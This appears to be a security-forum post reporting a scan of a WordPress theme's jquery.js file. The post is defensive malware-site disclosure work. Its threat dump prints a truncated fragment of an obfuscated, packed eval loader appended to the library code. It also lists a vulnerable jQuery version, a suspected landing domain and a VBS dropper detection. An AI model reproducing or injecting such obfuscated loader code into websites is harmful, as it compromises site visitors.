See: https://www.virustotal.com/nl/url/87087f2a942858808f1b0faa1db1b5f398de8086cd6f93c9c5b33c63c9984240/analysis/1446912332/
Re: /wp-content/themes/yusi1.0/js/jquery.js?ver=1.0
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method fromCharCode __tmpvar1036083678 = fromCharCode;
Threat dump: View code
[[.defaults=e.extend({},e.fn.tooltip.defaults,{placement:"right",trigger:"click",content:"",template:''}),e.fn.popover.noConflict=function(){returne.fn.popover=f,this}}(window.jQuery);eval(function(h,b,i,d,g,f){g=function(a){return(aឮ?"":g(parseInt(a/62)))+((a=a%62)ᡛ?String.fromCharCode(a+29):a.toString(36))};if("0".replace(0,g)==0){while(i--){f[g(i)]=d[i]}d=[function(a){returnf[a]||a}];g=function(){return"([6P-RT-Y]|[1-3]\\w)"};i=1}while(i--){if(d[i]){h=h.replace(newRegExp("\\b"+g(i)+"\\b","g"),d[i])}}returnh}('6q=1s;19.2I=!0;(U(){UL(a){Um(a){6f=a.24(0);T(f!==92)Vf;6b=a.1n(1);V(f=r[b])?f:"0"<=b%26%26b<="7"?2J(a.W(1),8):b==="u"||b==="x"?2J(a.W(2),16):a.24(1)}Ue(a){T(aថ)V(aក?"\\\\x0":"\\\\x")+a.toString(16);a=2K.2L(a);T(a==="\\\\"||a==="-"||a==="["||a==="]")a="\\\\"+a;Va}Uh(a){P(6f=a.W(1,a.Q-1).1a(/\\\\u[\\]]
Threat dump MD5: E69481A7165CEABC268C9F89B5AF5F0C
File size[byte]: 45075
File type: ASCII
Page/File MD5: 76761373286169D656C2C99B7ED3CCDA
Scan duration[sec]: 2.328000
Detected vulnerable code: Detected libraries:
jquery - 1.8.3 : -http://libs.baidu.com/jquery/1.8.3/jquery.min.js?ver=1.0
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
1 vulnerable library detected → http://www.domxssscanner.com/scan?url=http%3A%2F%2Flibs.baidu.com%2Fjquery%2F1.8.3%2Fjquery.min.js%3Fver%3D1.0
landing at: https://www.virustotal.com/nl/domain/c1.keyrun.cn/information/
Avast detected VBS:Dropper-DF [Trj] there…http://urlfind.org/?site=libs.baidu.com
polonus